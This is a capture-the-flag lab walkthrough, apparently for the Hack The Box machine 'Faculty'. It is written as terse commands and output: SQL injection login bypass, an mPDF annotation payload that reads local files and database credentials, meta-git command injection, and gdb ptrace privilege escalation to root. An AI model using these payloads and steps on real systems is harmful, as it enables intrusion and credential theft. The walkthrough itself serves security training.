Scanning
TARGET=10.10.11.169 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://faculty.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web Enum
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://faculty.htb/" -H "Host: FUZZ.faculty.htb"
nothing
> dirsearch -u http://faculty.htb -x 401,403
[18:01:40] 301 - 178B - /admin -> http://faculty.htb/admin/
[18:01:41] 302 - 14KB - /admin/ -> login.php
[18:01:41] 302 - 14KB - /admin/?/login -> login.php
[18:01:41] 200 - 17B - /admin/download.php
[18:01:41] 200 - 3KB - /admin/home.php
[18:01:41] 302 - 14KB - /admin/index.php -> login.php
[18:01:41] 200 - 5KB - /admin/login.php
[18:02:08] 200 - 3KB - /header.php
[18:02:10] 302 - 12KB - /index.php -> login.php
[18:02:14] 200 - 5KB - /login.php
[18:02:34] 500 - 0B - /test.php
> wfuzz -c -u http://faculty.htb/admin/FUZZ.php -w /usr/share/wordlists/dirb/common.txt --hl 7
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000371: 200 0 L 0 W 0 Ch "ajax"
000001069: 200 244 L 513 W 11186 Ch "courses"
000001173: 200 0 L 0 W 0 Ch "db_connect"
000001340: 200 1 L 0 W 17 Ch "download"
000001511: 500 42 L 88 W 1193 Ch "events"
000001564: 200 218 L 372 W 8532 Ch "faculty"
000001877: 200 47 L 106 W 2691 Ch "header"
000001908: 200 105 L 167 W 2995 Ch "home"
000002017: 302 420 L 809 W 13897 Ch "index"
000002347: 200 175 L 311 W 5618 Ch "login"
000003498: 200 201 L 371 W 5553 Ch "schedule"
000004245: 200 70 L 105 W 1593 Ch "users"
sqli
- admin login page is vulnerable to sqli
> sqlmap -u http://faculty.htb/admin/ajax.php?action=login --data "username=admin&password=test" -p username,password --dbs mysql --dump
1fecbe762af147c1176a0fc2c722a345
admin panel
- Can bypass the login via logic injection
> http://faculty.htb/admin/index.php?page=home
admin' or 1=1#
- Enum on the admin panel, I found there is a place to download pdf:
http://faculty.htb/admin/index.php?page=courses - The pdf download request can be examined and it seems to be a simple encoding process: urlencode > urlencode > base64 encode
- The decoded result is html. The generated pdf can be downloaded from a path called /mpdf/tmp, so we can google for this and found a possible exploit. https://snyk.io/vuln/composer:mpdf%2Fmpdf
- So, we can revert this process and include a tag that can load from the local filesystem,
<annotation> was used because it can include files from the local filesystem
<annotation file="/etc/passwd" content="<file-to-read>" icon="Graph" title="Attached File: file" pos-x="100" />
- base64 encode > urlencode > urlencode and intercept with burpsuite to generate a pdf. Then request to http://faculty.htb/mpdf/tmp/xxxxxxxxx.pdf to download the pdf and look for annotations to save the file locally.
> curl http://faculty.htb/admin/download.php -H "PHPSESSID=2066jnkf9es4lqdhl20m9grd65" -d "pdf=$(urlencode $(urlencode '<annotation file="/etc/nginx/sites-enabled/default" content="file" icon="Graph" title="Attached File: file" pos-x="195" />') | base64 -w0)"
OKZN7RKrUqQD08tofdFy1CkLcE.pdf
> curl http://faculty.htb/mpdf/tmp/OKZN7RKrUqQD08tofdFy1CkLcE.pdf --output file.pdf
# from /etc/nginx/sites-enabled/default, locate the backend code and read the db password from db_connect.php
> curl http://faculty.htb/admin/download.php -H "PHPSESSID=2066jnkf9es4lqdhl20m9grd65" -d "pdf=$(urlencode $(urlencode '<annotation file="/var/www/scheduling/admin/db_connect.php" content="file" icon="Graph" title="Attached File: file" pos-x="195" />') | base64 -w0)"
gbyolo:Co.met06aci.dly53ro.per
pe1
> gbyolo@faculty:/home$ sudo -l
Matching Defaults entries for gbyolo on faculty:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User gbyolo may run the following commands on faculty:
(developer) /usr/local/bin/meta-git
> sudo -u developer /usr/local/bin/meta-git clone 'meow | ls -la developer/.ssh'
- login and fetch the user flag
c499b72fb4a38e52450186c613581508
pe2
# https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/gdb = cap_sys_ptrace+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
- Use gdb to hook to a process that runs the system context, e.g python
> ps aux | grep python
root 725 0.0 0.9 26896 18000 ? Ss Oct02 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
develop+ 54718 0.0 0.0 5192 656 pts/0 S+ 02:54 0:00 grep python
> gdb -p 725
(gdb) call (void)system("chmod +s /bin/bash")
[Detaching after vfork from child process 21373]
(gdb) quit
developer@faculty:~$ bash -p
bash-5.0# id
uid=1001(developer) gid=1002(developer) euid=0(root) egid=0(root) groups=0(root),1001(debug),1002(developer),1003(faculty)
bash-5.0# cat /root/root.txt
1479beb5d02e06ebf2c77ea791aac120
